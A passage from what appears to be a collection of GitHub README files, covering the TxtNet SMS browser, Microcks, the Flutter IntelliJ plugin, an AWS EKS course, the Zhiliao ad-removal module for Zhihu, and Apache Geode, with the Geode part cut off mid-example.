own server, follow the instructions below: 1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts) 2. Create a Twilio application for the number. 3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application 4. Open the ngrok directory and run this command: `./ngrok tcp 5000` 5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the "A Message Comes In" section after selecting "webhook". For example: "https://xyz.ngrok.io/receive_sms" 6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using "pip install x" 7. 
Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py` 8. In the TxtNet Browser app, press the three dots and press "Change Server Phone Number". Enter in the phone number you purchased from Twilio and press OK! </strike> ## FAQ/Troubleshooting Bugs: - Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it "stalled" while loading on large pages. As of now, the only way to fix this is to wait! - In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are received by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again. - In Android 12 (or possibly a new version of Google Messages?), there is a new and "improved" messages blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this "feature", you can silence message notifications from the server phone number. <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/silentMessages.png" alt="Silence Number" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/Messages_Migrating_Popup.png" alt="Contacts Popup" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/MigratingBlockedContacts.png" alt="Migrating Contacts" width="200"/> ## Screenshots (TxtNet 1.0) <table> <tr> <td> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot1.png" alt="1" height = 640px ></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot2.png" alt="2" height = 640px></td> </tr> <tr> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot3.png" alt="3" height = 640px></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot4.png" align="right" alt="4" height = 640px> </td> </tr> </table> ##### Demo (TxtNet 1.0) https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4 > Demo video shown above ## Development ### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app. Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community. ## Future Impact My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include: - Those in countries with a low median income and prohibitively expensive data plans - Those who live under oppressive governments, with near impenetrable internet censorship If you think you might be able to help fund a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description! ## License GPLv3 - See LICENSE.md ## Credits Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest.
Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project! My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202). In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app.
0
microcks/microcks
Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀
api api-testing asyncapi asyncapi-specification cncf cncf-project event-driven graphql kubernetes mock mock-server mocking openapi openapi-tooling openapi3 openapi31 postman-collection swagger swagger2 testing
<img src="./microcks-banner.png" width="600"> [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) [![Container](https://img.shields.io/badge/dynamic/json?color=blueviolet&logo=docker&style=for-the-badge&label=Quay.io&query=tags[0].name&url=https://quay.io/api/v1/repository/microcks/microcks/tag/?limit=10&page=1&onlyActiveTags=true)](https://quay.io/repository/microcks/microcks?tab=tags) [![Version](https://img.shields.io/maven-central/v/io.github.microcks/microcks?color=blue&style=for-the-badge)](https://search.maven.org/artifact/io.github.microcks/microcks) [![License](https://img.shields.io/github/license/microcks/microcks?style=for-the-badge&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0) [![Project Chat](https://img.shields.io/badge/discord-microcks-pink.svg?color=7289da&style=for-the-badge&logo=discord)](https://microcks.io/discord-invite/) # Microcks - Kubernetes native tool for API Mocking & Testing Microcks is a platform for turning your API and microservices assets - *OpenAPI specs*, *AsyncAPI specs*, *gRPC protobuf*, *GraphQL schema*, *Postman collections*, *SoapUI projects* - into live mocks in seconds. It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with *Jenkins*, *GitHub Actions*, *Tekton* and many others through a simple CLI. ## Getting Started * [Documentation](https://microcks.io/documentation/getting-started/) To get involved with our community, please make sure you are familiar with the project's [Code of Conduct](./CODE_OF_CONDUCT.md). ## Build Status The current development version is `1.9.1-SNAPSHOT`. [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?branch=1.9.x&logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) #### Sonarcloud Quality metrics [![Code Smells](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=code_smells)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=reliability_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Bugs](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=bugs)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Coverage](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=coverage)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) ## Versions Here are the naming conventions we're using for current releases and ongoing development/maintenance activities.
| Status | Version | Branch | Container images tags | | ----------- |------------------|----------|----------------------------------| | Stable | `1.9.0` | `master` | `1.9.0`, `1.9.0-fix-2`, `latest` | | Dev | `1.9.1-SNAPSHOT` | `1.9.x` | `nightly` | | Maintenance | `1.8.2-SNAPSHOT` | `1.8.x` | `maintenance` | ## How to build Microcks The build instructions are available in the [contribution guide](CONTRIBUTING.md). ## Thanks to our community! [![Stargazers repo roster for @microcks/microcks](http://reporoster.com/stars/microcks/microcks)](http://github.com/microcks/microcks/stargazers) [![Forkers repo roster for @microcks/microcks](http://reporoster.com/forks/microcks/microcks)](http://github.com/microcks/microcks/network/members)
0
flutter/flutter-intellij
Flutter Plugin for IntelliJ
flutter intellij-plugin java
# <img src="https://github.com/dart-lang/site-shared/blob/master/src/_assets/image/flutter/icon/64.png?raw=1" alt="Flutter" width="26" height="26"/> Flutter Plugin for IntelliJ [![Latest plugin version](https://img.shields.io/jetbrains/plugin/v/9212)](https://plugins.jetbrains.com/plugin/9212-flutter) [![Build Status](https://travis-ci.org/flutter/flutter-intellij.svg)](https://travis-ci.org/flutter/flutter-intellij) An IntelliJ plugin for [Flutter](https://flutter.dev/) development. Flutter is a multi-platform app SDK to help developers and designers build modern apps for iOS, Android and the web. ## Documentation - [flutter.dev](https://flutter.dev) - [Installing Flutter](https://flutter.dev/docs/get-started/install) - [Getting Started with IntelliJ](https://flutter.dev/docs/development/tools/ide) ## Fast development Flutter's <em>hot reload</em> helps you quickly and easily experiment, build UIs, add features, and fix bugs faster. Experience sub-second reload times, without losing state, on emulators, simulators, and hardware for iOS and Android. <img src="https://user-images.githubusercontent.com/919717/28131204-0f8c3cda-66ee-11e7-9428-6a0513eac75d.gif" alt="Make a change in your code, and your app is changed instantly."> ## Quick-start A brief summary of the [getting started guide](https://flutter.dev/docs/development/tools/ide): - install the [Flutter SDK](https://flutter.dev/docs/get-started/install) - run `flutter doctor` from the command line to verify your installation - ensure you have a supported IntelliJ development environment; either: - the latest stable version of [IntelliJ](https://www.jetbrains.com/idea/download), Community or Ultimate Edition (EAP versions are not always supported) - the latest stable version of [Android Studio](https://developer.android.com/studio) (note: Android Studio Canary versions are generally _not_ supported) - open the plugin preferences - `Preferences > Plugins` on macOS, `File > Settings > Plugins` on Linux, select "Browse repositories…" - search for and install the 'Flutter' plugin - choose the option to restart IntelliJ - configure the Flutter SDK setting - `Preferences` on macOS, `File > Settings` on Linux, select `Languages & Frameworks > Flutter`, and set the path to the root of your flutter repo ## Filing issues Please use our [issue tracker](https://github.com/flutter/flutter-intellij/issues) for Flutter IntelliJ issues. - for more general Flutter issues, you should prefer to use the Flutter [issue tracker](https://github.com/flutter/flutter/issues) - for more Dart IntelliJ related issues, you can use JetBrains' [YouTrack tracker](https://youtrack.jetbrains.com/issues?q=%23Dart%20%23Unresolved%20) ## Known issues Please note the following known issues: - [#601](https://github.com/flutter/flutter-intellij/issues/601): IntelliJ will read the PATH variable just once on startup. Thus, if you change PATH later to include the Flutter SDK path, this will not have an effect in IntelliJ until you restart the IDE. - If you require network access to go through proxy settings, you will need to set the `https_proxy` variable in your environment as described in the [pub docs](https://dart.dev/tools/pub/troubleshoot#pub-get-fails-from-behind-a-corporate-firewall). (See also: [#2914](https://github.com/flutter/flutter-intellij/issues/2914).) ## Dev Channel If you like getting new features as soon as they've been added to the code then you might want to try out the dev channel. It is updated weekly with the latest contents from the "master" branch.
It has minimal testing. Setup instructions are in the wiki's [dev channel page](https://github.com/flutter/flutter-intellij/wiki/Dev-Channel).
0
stacksimplify/aws-eks-kubernetes-masterclass
AWS EKS Kubernetes - Masterclass | DevOps, Microservices
aws-alb aws-alb-ingress-controller aws-cloudwatch aws-codebuild aws-codecommit aws-codepipeline aws-ebs aws-eks aws-eks-cluster aws-fargate aws-rds docker fluentd kubernetes kubernetes-deployment kubernetes-pods kubernetes-secrets kubernetes-services yaml
# AWS EKS - Elastic Kubernetes Service - Masterclass [![Image](https://stacksimplify.com/course-images/AWS-EKS-Kubernetes-Masterclass-DevOps-Microservices-course.png "AWS EKS Kubernetes - Masterclass")](https://www.udemy.com/course/aws-eks-kubernetes-masterclass-devops-microservices/?referralCode=257C9AD5B5AF8D12D1E1) ## Course Modules | S.No | AWS Service Name | | ---- | ---------------- | | 1. | Create AWS EKS Cluster using eksctl CLI | | 2. | [Docker Fundamentals](https://github.com/stacksimplify/docker-fundamentals) | | 3. | [Kubernetes Fundamentals](https://github.com/stacksimplify/kubernetes-fundamentals) | | 4. | EKS Storage with AWS EBS CSI Driver | | 5. | Kubernetes Important Concepts for Application Deployments | | 5.1 | Kubernetes - Secrets | | 5.2 | Kubernetes - Init Containers | | 5.3 | Kubernetes - Liveness & Readiness Probes | | 5.4 | Kubernetes - Requests & Limits | | 5.5 | Kubernetes - Namespaces, Limit Range and Resource Quota | | 6. | EKS Storage with AWS RDS MySQL Database | | 7. | Load Balancing using CLB & NLB | | 7.1 | Load Balancing using CLB - AWS Classic Load Balancer | | 7.2 | Load Balancing using NLB - AWS Network Load Balancer | | 8. | Load Balancing using ALB - AWS Application Load Balancer | | 8.1 | ALB Ingress Controller - Install | | 8.2 | ALB Ingress - Basics | | 8.3 | ALB Ingress - Context path based routing | | 8.4 | ALB Ingress - SSL | | 8.5 | ALB Ingress - SSL Redirect HTTP to HTTPS | | 8.6 | ALB Ingress - External DNS | | 9. | Deploy Kubernetes workloads on AWS Fargate Serverless | | 9.1 | AWS Fargate Profiles - Basic | | 9.2 | AWS Fargate Profiles - Advanced using YAML | | 10. | Build and Push Container to AWS ECR and use that in EKS | | 11. | DevOps with AWS Developer Tools CodeCommit, CodeBuild and CodePipeline | | 12. | Microservices Deployment on EKS - Service Discovery | | 13. | Microservices Distributed Tracing using AWS X-Ray | | 14. | Microservices Canary Deployments | | 15. | EKS HPA - Horizontal Pod Autoscaler | | 16. | EKS VPA - Vertical Pod Autoscaler | | 17. | EKS CA - Cluster Autoscaler | | 18. | EKS Monitoring using CloudWatch Agent & Fluentd - Container Insights | ## AWS Services Covered | S.No | AWS Service Name | | ---- | ---------------- | | 1. | AWS EKS - Elastic Kubernetes Service | | 2. | AWS EBS - Elastic Block Store | | 3. | AWS RDS - Relational Database Service MySQL | | 4. | AWS CLB - Classic Load Balancer | | 5. | AWS NLB - Network Load Balancer | | 6. | AWS ALB - Application Load Balancer | | 7. | AWS Fargate - Serverless | | 8. | AWS ECR - Elastic Container Registry | | 9. | AWS Developer Tool - CodeCommit | | 10. | AWS Developer Tool - CodeBuild | | 11. | AWS Developer Tool - CodePipeline | | 12. | AWS X-Ray | | 13. | AWS CloudWatch - Container Insights | | 14. | AWS CloudWatch - Log Groups & Log Insights | | 15. | AWS CloudWatch - Alarms | | 16. | AWS Route53 | | 17. | AWS Certificate Manager | | 18. | EKS CLI - eksctl | ## Kubernetes Concepts Covered | S.No | Kubernetes Concept Name | | ---- | ------------------- | | 1. | Kubernetes Architecture | | 2. | Pods | | 3. | ReplicaSets | | 4. | Deployments | | 5. | Services - Node Port Service | | 6. | Services - Cluster IP Service | | 7. | Services - External Name Service | | 8. | Services - Ingress Service | | 9. | Services - Ingress SSL & SSL Redirect | | 10. | Services - Ingress & External DNS | | 11. | Imperative - with kubectl | | 12. | Declarative - Declarative with YAML | | 13. | Secrets | | 14. | Init Containers | | 15. | Liveness & Readiness Probes | | 16. 
| Requests & Limits | | 17. | Namespaces - Imperative | | 18. | Namespaces - Limit Range | | 19. | Namespaces - Resource Quota | | 20. | Storage Classes | | 21. | Persistent Volumes | | 22. | Persistent Volume Claims | | 23. | Services - Load Balancers | | 24. | Annotations | | 25. | Canary Deployments | | 26. | HPA - Horizontal Pod Autoscaler | | 27. | VPA - Vertical Pod Autoscaler | | 28. | CA - Cluster Autoscaler | | 29. | DaemonSets | | 30. | DaemonSets - Fluentd for logs | | 31. | Config Maps | ## List of Docker Images on Docker Hub | Application Name | Docker Image Name | | ----------------- | ----------------- | | Simple Nginx V1 | stacksimplify/kubenginx:1.0.0 | | Spring Boot Hello World API | stacksimplify/kube-helloworld:1.0.0 | | Simple Nginx V2 | stacksimplify/kubenginx:2.0.0 | | Simple Nginx V3 | stacksimplify/kubenginx:3.0.0 | | Simple Nginx V4 | stacksimplify/kubenginx:4.0.0 | | Backend Application | stacksimplify/kube-helloworld:1.0.0 | | Frontend Application | stacksimplify/kube-frontend-nginx:1.0.0 | | Kube Nginx App1 | stacksimplify/kube-nginxapp1:1.0.0 | | Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 | | User Management Microservice with MySQLDB | stacksimplify/kube-usermanagement-microservice:1.0.0 | | User Management Microservice with H2 DB | stacksimplify/kube-usermanagement-microservice:2.0.0-H2DB | | User Management Microservice with MySQL DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:3.0.0-AWS-XRay-MySQLDB | | User Management Microservice with H2 DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:4.0.0-AWS-XRay-H2DB | | Notification Microservice V1 | stacksimplify/kube-notifications-microservice:1.0.0 | | Notification Microservice V2 | stacksimplify/kube-notifications-microservice:2.0.0 | | Notification Microservice V1 with AWS X-Ray | stacksimplify/kube-notifications-microservice:3.0.0-AWS-XRay | | Notification Microservice V2 with AWS X-Ray | stacksimplify/kube-notifications-microservice:4.0.0-AWS-XRay | ## List of Docker Images you build in AWS ECR | Application Name | Docker Image Name | | ----------------- | ----------------- | | AWS Elastic Container Registry | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/aws-ecr-kubenginx:DATETIME-REPOID | | DevOps Usecase | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/eks-devops-nginx:DATETIME-REPOID | ## Sample Applications - User Management Microservice - Notification Microservice - Nginx Applications ## What will students learn in this course? - You will write Kubernetes manifests with confidence after going through live template writing sections - You will learn 30+ Kubernetes concepts and use 18 AWS services in combination with EKS - You will learn Kubernetes fundamentals in both imperative and declarative approaches - You will learn to write and deploy k8s manifests for storage concepts like storage classes, persistent volume claims (PVC), MySQL, and the EBS CSI Driver - You will learn to switch from native EBS storage to an RDS database using the k8s external name service - You will learn to write and deploy load balancer k8s manifests for Classic and Network Load Balancers - You will learn to write ingress k8s manifests, enabling features like context path based routing, SSL, SSL redirect and External DNS. 
- You will learn to write k8s manifests for advanced Fargate profiles and perform mixed-mode workload deployments in both EC2 and Fargate Serverless - You will learn to use ECR - Elastic Container Registry in combination with EKS. - You will implement DevOps concepts with AWS Code Services like CodeCommit, CodeBuild and CodePipeline - You will implement microservices core concepts like Service Discovery, Distributed Tracing using X-Ray and Canary Deployments - You will learn to enable autoscaling features like HPA, VPA and Cluster Autoscaler - You will learn to enable monitoring and logging for the EKS cluster and its workloads using CloudWatch Container Insights - You will learn Docker fundamentals by implementing use cases like downloading an image from Docker Hub and running it on your local desktop, and building an image locally, testing it, and pushing it to Docker Hub. - You will slowly start by learning Docker fundamentals and move on to Kubernetes. - You will master many kubectl commands in the process ## Are there any course requirements or prerequisites? - You must have an AWS account to follow along with the hands-on activities. - You don't need any prior Docker or Kubernetes knowledge to start this course. ## Who are the target students? - AWS Architects or Sysadmins or Developers who are planning to master Elastic Kubernetes Service (EKS) for running applications on Kubernetes - Any beginner who is interested in learning Kubernetes on the cloud using AWS EKS. - Any beginner who is interested in learning Kubernetes DevOps and Microservices deployments on Kubernetes ## Each of my courses comes with - Amazing Hands-on Step By Step Learning Experiences - Real Implementation Experience - Friendly Support in the Q&A section - 30 Day "No Questions Asked" Money Back Guarantee! ## My Other AWS Courses - [Udemy Enroll](https://github.com/stacksimplify/udemy-enroll) ## Stack Simplify Udemy Profile - [Udemy Profile](https://www.udemy.com/user/kalyan-reddy-9/) # Azure Kubernetes Service with Azure DevOps and Terraform [![Image](https://stacksimplify.com/course-images/azure-kubernetes-service-with-azure-devops-and-terraform.png "Azure Kubernetes Service with Azure DevOps and Terraform")](https://www.udemy.com/course/azure-kubernetes-service-with-azure-devops-and-terraform/?referralCode=2499BF7F5FAAA506ED42)
0
shatyuka/Zhiliao
An Xposed module that removes ads from Zhihu
xposed zhihu zhiliao
# 知了 (Zhiliao)

An Xposed module that removes ads from Zhihu

[![Chat](https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegram)](https://t.me/joinchat/OibCWxbdCMkJ2fG8J1DpQQ) [![Subscribe](https://img.shields.io/badge/Telegram-Subscribe-blue.svg?logo=telegram)](https://t.me/zhiliao) [![Download](https://img.shields.io/github/v/release/shatyuka/Zhiliao?label=Download)](https://github.com/shatyuka/Zhiliao/releases/latest) [![Stars](https://img.shields.io/github/stars/shatyuka/Zhiliao?label=Stars)](https://github.com/shatyuka/Zhiliao) [![License](https://img.shields.io/github/license/shatyuka/Zhiliao?label=License)](https://choosealicense.com/licenses/gpl-3.0/)

## Features

- Ads
  - Remove splash-screen ads
  - Remove feed ads
  - Remove answer-list ads
  - Remove comment ads
  - Remove share-sheet ads
  - Remove ads below answers
  - Remove search ads
- Other
  - Filter videos
  - Filter articles
  - Remove membership recommendations from the feed
  - Remove answer circles
  - Remove product recommendations
  - Remove related searches
  - Remove keyword searches
  - Open external links directly
  - Disable color-mode switching
  - Show card categories
  - Immersive status bar
  - Prevent entering full-screen mode
  - Unlock third-party login
- UI cleanup
  - Remove the live-stream button
  - Hide red-dot badges
  - Hide membership cards
  - Hide trending notifications
  - Simplify article pages
  - Hide pinned trending items
  - Hide mixed cards
- Navigation bar
  - Hide the membership button
  - Hide the video button
  - Hide the follow button
  - Hide the publish button
  - Hide the discover button
  - Disable event themes
  - Hide the navigation-bar bump
- Swiping
  - Swipe left/right to switch answers
  - Remove the "next answer" button
- Custom filters
- Inject JS scripts
- Clean up temporary files

## Help

[Github Wiki](https://github.com/shatyuka/Zhiliao/wiki)

## Download

[Github Release](https://github.com/shatyuka/Zhiliao/releases/latest) [Xposed Repo](https://repo.xposed.info/module/com.shatyuka.zhiliao) [蓝奏云 (Lanzou Cloud)](https://wwa.lanzoux.com/b00tscbwd) password: 1hax

## License

This project is licensed under the [GNU General Public Licence, version 3](https://choosealicense.com/licenses/gpl-3.0/).
0
apache/geode
Apache Geode
apache datagrid geode
<div align="center"> [![Apache Geode logo](https://geode.apache.org/img/Apache_Geode_logo.png)](http://geode.apache.org) [![Build Status](https://concourse.apachegeode-ci.info/api/v1/teams/main/pipelines/apache-develop-main/badge)](https://concourse.apachegeode-ci.info/teams/main/pipelines/apache-develop-main) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.apache.geode/geode-core/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22) [![homebrew](https://img.shields.io/homebrew/v/apache-geode.svg)](https://formulae.brew.sh/formula/apache-geode) [![Docker Pulls](https://img.shields.io/docker/pulls/apachegeode/geode.svg)](https://hub.docker.com/r/apachegeode/geode/) [![Total alerts](https://img.shields.io/lgtm/alerts/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/alerts/) [![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:java) [![Language grade: JavaScript](https://img.shields.io/lgtm/grade/javascript/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:javascript) [![Language grade: Python](https://img.shields.io/lgtm/grade/python/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:python) </div> ## Contents 1. [Overview](#overview) 2. [How to Get Apache Geode](#obtaining) 3. [Main Concepts and Components](#concepts) 4. [Location of Directions for Building from Source](#building) 5. [Geode in 5 minutes](#started) 6. [Application Development](#development) 7. [Documentation](https://geode.apache.org/docs/) 8. [Wiki](https://cwiki.apache.org/confluence/display/GEODE/Index) 9. [How to Contribute](https://cwiki.apache.org/confluence/display/GEODE/How+to+Contribute) 10. [Export Control](#export) ## <a name="overview"></a>Overview [Apache Geode](http://geode.apache.org/) is a data management platform that provides real-time, consistent access to data-intensive applications throughout widely distributed cloud architectures. Apache Geode pools memory, CPU, network resources, and optionally local disk across multiple processes to manage application objects and behavior. It uses dynamic replication and data partitioning techniques to implement high availability, improved performance, scalability, and fault tolerance. In addition to being a distributed data container, Apache Geode is an in-memory data management system that provides reliable asynchronous event notifications and guaranteed message delivery. Apache Geode is a mature, robust technology originally developed by GemStone Systems. Commercially available as GemFire™, it was first deployed in the financial sector as the transactional, low-latency data engine used in Wall Street trading platforms. Today Apache Geode technology is used by hundreds of enterprise customers for high-scale business applications that must meet low latency and 24x7 availability requirements. ## <a name="obtaining"></a>How to Get Apache Geode You can download Apache Geode from the [website](https://geode.apache.org/releases/), run a Docker [image](https://hub.docker.com/r/apachegeode/geode/), or install with [Homebrew](https://formulae.brew.sh/formula/apache-geode) on OSX. 
Application developers can load dependencies from [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22). Maven ```xml <dependencies> <dependency> <groupId>org.apache.geode</groupId> <artifactId>geode-core</artifactId> <version>$VERSION</version> </dependency> </dependencies> ``` Gradle ```groovy dependencies { compile "org.apache.geode:geode-core:$VERSION" } ``` ## <a name="concepts"></a>Main Concepts and Components _Caches_ are an abstraction that describe a node in an Apache Geode distributed system. Within each cache, you define data _regions_. Data regions are analogous to tables in a relational database and manage data in a distributed fashion as name/value pairs. A _replicated_ region stores identical copies of the data on each cache member of a distributed system. A _partitioned_ region spreads the data among cache members. After the system is configured, client applications can access the distributed data in regions without knowledge of the underlying system architecture. You can define listeners to receive notifications when data has changed, and you can define expiration criteria to delete obsolete data in a region. _Locators_ provide clients with both discovery and server load balancing services. Clients are configured with locator information, and the locators maintain a dynamic list of member servers. The locators provide clients with connection information to a server. Apache Geode includes the following features: * Combines redundancy, replication, and a "shared nothing" persistence architecture to deliver fail-safe reliability and performance. * Horizontally scalable to thousands of cache members, with multiple cache topologies to meet different enterprise needs. The cache can be distributed across multiple computers. * Asynchronous and synchronous cache update propagation. * Delta propagation distributes only the difference between old and new versions of an object (delta) instead of the entire object, resulting in significant distribution cost savings. * Reliable asynchronous event notifications and guaranteed message delivery through optimized, low latency distribution layer. * Data awareness and real-time business intelligence. If data changes as you retrieve it, you see the changes immediately. * Integration with Spring Framework to speed and simplify the development of scalable, transactional enterprise applications. * JTA compliant transaction support. * Cluster-wide configurations that can be persisted and exported to other clusters. * Remote cluster management through HTTP. * REST APIs for REST-enabled application development. * Rolling upgrades may be possible, but they will be subject to any limitations imposed by new features. ## <a name="building"></a>Building this Release from Source See [BUILDING.md](./BUILDING.md) for instructions on how to build the project. ## <a name="testing"></a>Running Tests See [TESTING.md](./TESTING.md) for instructions on how to run tests. ## <a name="started"></a>Geode in 5 minutes Geode requires installation of JDK version 1.8. 
After installing Apache Geode, start a locator and server: ```console $ gfsh gfsh> start locator gfsh> start server ``` Create a region: ```console gfsh> create region --name=hello --type=REPLICATE ``` Write a client application (this example uses a [Gradle](https://gradle.org) build script): _build.gradle_ ```groovy apply plugin: 'java' apply plugin: 'application' mainClassName = 'HelloWorld' repositories { mavenCentral() } dependencies { compile 'org.apache.geode:geode-core:1.4.0' runtime 'org.slf4j:slf4j-log4j12:1.7.24' } ``` _src/main/java/HelloWorld.java_ ```java import java.util.Map; import org.apache.geode.cache.Region; import org.apache.geode.cache.client.*; public class HelloWorld { public static void main(String[] args) throws Exception { ClientCache cache = new ClientCacheFactory() .addPoolLocator("localhost", 10334) .create(); Region<String, String> region = cache .<String, String>createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY) .create("hello"); region.put("1", "Hello"); region.put("2", "World"); for (Map.Entry<String, String> entry : region.entrySet()) { System.out.format("key = %s, value = %s\n", entry.getKey(), entry.getValue()); } cache.close(); } } ``` Build and run the `HelloWorld` example: ```console $ gradle run ``` The application will connect to the running cluster, create a local cache, put some data in the cache, and print the cached data to the console: ```console key = 1, value = Hello key = 2, value = World ``` Finally, shutdown the Geode server and locator: ```console gfsh> shutdown --include-locators=true ``` For more information see the [Geode Examples](https://github.com/apache/geode-examples) repository or the [documentation](https://geode.apache.org/docs/). ## <a name="development"></a>Application Development Apache Geode applications can be written in these client technologies: * Java [client](https://geode.apache.org/docs/guide/18/topologies_and_comm/cs_configuration/chapter_overview.html) or [peer](https://geode.apache.org/docs/guide/18/topologies_and_comm/p2p_configuration/chapter_overview.html) * [REST](https://geode.apache.org/docs/guide/18/rest_apps/chapter_overview.html) * [Memcached](https://cwiki.apache.org/confluence/display/GEODE/Moving+from+memcached+to+gemcached) The following libraries are available external to the Apache Geode project: * [Spring Data GemFire](https://projects.spring.io/spring-data-gemfire/) * [Spring Cache](https://docs.spring.io/spring/docs/current/spring-framework-reference/html/cache.html) * [Python](https://github.com/gemfire/py-gemfire-rest) ## <a name="export"></a>Export Control This distribution includes cryptographic software. The country in which you currently reside may have restrictions on the import, possession, use, and/or re-export to another country, of encryption software. BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted. See <http://www.wassenaar.org/> for more information. The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS), has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1, which includes information security software using or performing cryptographic functions with asymmetric algorithms. 
The form and manner of this Apache Software Foundation distribution makes it eligible for export under the License Exception ENC Technology Software Unrestricted (TSU) exception (see the BIS Export Administration Regulations, Section 740.13) for both object code and source code. The following provides more details on the included cryptographic software: * Apache Geode is designed to be used with [Java Secure Socket Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/jsse/JSSERefGuide.html) (JSSE) and [Java Cryptography Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html) (JCE). The [JCE Unlimited Strength Jurisdiction Policy](https://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html) may need to be installed separately to use keystore passwords with 7 or more characters. * Apache Geode links to and uses [OpenSSL](https://www.openssl.org/) ciphers.
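Returning to the client API shown in "Geode in 5 minutes": the concepts section notes that you can define listeners to receive notifications when region data changes. As a minimal sketch (using the same `geode-core` dependency and locator as the HelloWorld example; the listener registration uses the public `ClientRegionFactory.addCacheListener` API), a client can log every create and update on its region:

```java
import org.apache.geode.cache.EntryEvent;
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.*;
import org.apache.geode.cache.util.CacheListenerAdapter;

public class HelloListener {
  public static void main(String[] args) {
    ClientCache cache = new ClientCacheFactory()
        .addPoolLocator("localhost", 10334)
        .create();

    // Register a listener that logs every create/update on the region.
    Region<String, String> region = cache
        .<String, String>createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY)
        .addCacheListener(new CacheListenerAdapter<String, String>() {
          @Override
          public void afterCreate(EntryEvent<String, String> event) {
            System.out.format("created %s = %s%n", event.getKey(), event.getNewValue());
          }

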